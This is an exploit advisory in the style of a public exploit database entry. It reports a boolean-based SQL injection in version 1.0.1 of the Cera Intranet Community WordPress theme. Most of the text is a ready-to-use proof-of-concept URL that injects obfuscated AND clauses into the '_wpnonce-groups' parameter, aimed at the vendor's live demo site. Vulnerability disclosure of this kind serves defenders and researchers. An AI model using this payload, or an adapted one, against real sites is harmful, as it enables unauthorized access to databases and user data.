Cera Intranet Community Theme version 1.0.1 suffers from a remote SQL injection vulnerability.
7f4a4918440ef190708ffb505e89d8be
===========================================================================================
# Exploit Title: cera-intranet-community-theme SQL Inj.
# Dork: N/A
# Date: 29-12-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://themeforest.net/item/cera-intranet-community-theme/24872621
# Software Link:
https://themeforest.net/item/cera-intranet-community-theme/24872621
# Version: v1.0.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: N/A
===========================================================================================
# POC - SQLi (Boolean Based)
# Parameters : _wpnonce-groups
# Attack Pattern :
https://intranet-dark.cera-theme.com/?_wp_http_referer=/home/&groups_widget_max=8&_wpnonce-groups=45a424e69f%27/**/aNd/**/5468967=5468967/**/aNd/**/%276199%27=%276199
# GET Method :
https://intranet-dark.cera-theme.com/?_wp_http_referer=/home/&groups_widget_max=8&_wpnonce-groups=45a424e69f
===========================================================================================